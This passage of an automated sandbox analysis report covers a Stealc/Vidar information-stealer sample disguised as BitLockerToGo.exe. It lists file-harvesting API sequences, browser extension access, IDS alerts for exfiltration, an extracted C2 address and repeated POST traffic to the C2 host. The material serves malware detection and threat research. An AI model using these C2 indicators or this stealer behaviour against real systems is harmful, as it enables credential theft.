                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_00408776
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose,3_2_00413B10
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose,3_2_004013DA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_00406784
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,3_2_00411187
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00412A5D
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_00409C78
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00408224
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00412539
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_00411BD2
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00411722
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: chrome.exeMemory has grown: Private usage: 5MB later: 38MB

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.8:49717 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49719 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.8:49714 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 77.239.117.222:443 -> 192.168.2.8:49717
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49743 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 77.239.117.222:443 -> 192.168.2.8:49716
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49746 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49746 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49747 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49747 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49749 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49718 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49785 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49785 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49778 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49853 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49853 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49839 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49839 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49808 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49808 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49859 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49859 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49748 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49748 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49805 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49805 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49936 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49946 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49957 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49904 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50019 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50042 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50036 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50048 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50056 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50071 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50065 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49891 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50117 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50094 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50100 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50013 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50088 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50077 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:50111 -> 77.239.117.222:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199825403037
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 77.239.117.222Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----pzctjec2n7y58ycjw47qHost: 77.239.117.222Content-Length: 255Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----y5fk6f37qie37q1ngl6xHost: 77.239.117.222Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----gva1noz5pphvaasr1dbsHost: 77.239.117.222Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----d2djecbiwb1dbaas268yHost: 77.239.117.222Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----imy5ph47qq9zm79h47qqHost: 77.239.117.222Content-Length: 6101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----imy5ph47qq9zm79h47qqHost: 77.239.117.222Content-Length: 489Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----t26pphlfc2ngvaaieusrHost: 77.239.117.222Content-Length: 505Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----rimglf379zctrq9r1ng4Host: 77.239.117.222Content-Length: 213453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----rimglf379zctrq9r1ng4Host: 77.239.117.222Content-Length: 55081Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ozu37qqqiwl6f3wbsrimHost: 77.239.117.222Content-Length: 142457Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----v3w4euaiect0zusjw4wbHost: 77.239.117.222Content-Length: 493Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----xt2dbs0r1n7yua1db1nyHost: 77.239.117.222Content-Length: 3161Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----fc2no8yct00rqi58gvkxHost: 77.239.117.222Content-Length: 207993Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----q9h4w4oppph47ymohl68Host: 77.239.117.222Content-Length: 68733Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----89hdt0hdbimozmyukny5Host: 77.239.117.222Content-Length: 262605Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ieusjwb1v3oh479riwbiHost: 77.239.117.222Content-Length: 393697Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----qiwlx4euknop8ymym7qqHost: 77.239.117.222Content-Length: 131557Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----pph4eu37qieuaaasr9h4Host: 77.239.117.222Content-Length: 6990993Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----jecbi5fkfusrqq9zmyctHost: 77.239.117.222Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----kx4opzcbi5fcbie37q9rHost: 77.239.117.222Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----hv3ek6fknop8ym7ymophHost: 77.239.117.222Content-Length: 61029Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----q9h4w4oppph47ymohl68Host: 77.239.117.222Content-Length: 7005Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----89zcba1nym7gv3e3oh47Host: 77.239.117.222Content-Length: 60993Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----26xbs2dtrqieuaimgdjmHost: 77.239.117.222Content-Length: 61005Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----hdj5fc2ngvaaaimy5xlfHost: 77.239.117.222Content-Length: 6985Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----uai5x4w47gv3eus0hdtjHost: 77.239.117.222Content-Length: 60969Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----jecbasjekf37qieu37qqHost: 77.239.117.222Content-Length: 32481Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2d2vasr9h4e3eus0hd2vHost: 77.239.117.222Content-Length: 4421Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2d2vasr9h4e3eus0hd2vHost: 77.239.117.222Content-Length: 2449Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----mophdt0hdjmyuaiwtje3Host: 77.239.117.222Content-Length: 6533Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----y58gdtjm7gvaaaie3wbaHost: 77.239.117.222Content-Length: 3269Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4op8gvkxt2v37q1nohdbHost: 77.239.117.222Content-Length: 11445Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----dtrqieuaai58yuaiwtjmHost: 77.239.117.222Content-Length: 14153Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----nyc2ngv37ycbim7y5xbiHost: 77.239.117.222Content-Length: 4277Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----nyc2ngv37ycbim7y5xbiHost: 77.239.117.222Content-Length: 4273Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----zu3o8glf3ekfu3ecjmglHost: 77.239.117.222Content-Length: 4573Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----gvs0hvs2v3w4e3euk6p8Host: 77.239.117.222Content-Length: 1977Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----vaimy5pp8q9zmyct00riHost: 77.239.117.222Content-Length: 3161Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----xbieu3e3ec2nymgdtjeuHost: 77.239.117.222Content-Length: 1697Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----hv3ek6fknop8ym7ymophHost: 77.239.117.222Content-Length: 1929Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----i5x4ozu3euasrq16pzu3Host: 77.239.117.222Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----gvs00r1nym79rq1vs0zuHost: 77.239.117.222Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----yu379r9hlfkx479h47ymHost: 77.239.117.222Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 20.189.173.7 20.189.173.7
                  Source: Joe Sandbox ViewIP Address: 2.22.242.105 2.22.242.105
                  Source: Joe Sandbox ViewIP Address: 23.219.82.59 23.219.82.59
                  Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49716 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49718 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49714 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49719 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49713 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49717 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49746 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49747 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49748 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49749 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49743 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49778 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49785 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49805 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49808 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49839 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49853 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49859 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49876 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49870 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49891 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49920 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49904 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49957 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50013 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50042 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49936 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50048 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50056 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49946 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50071 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50065 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50094 -> 77.239.117.222:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:50077 -> 77.239.117.222:443
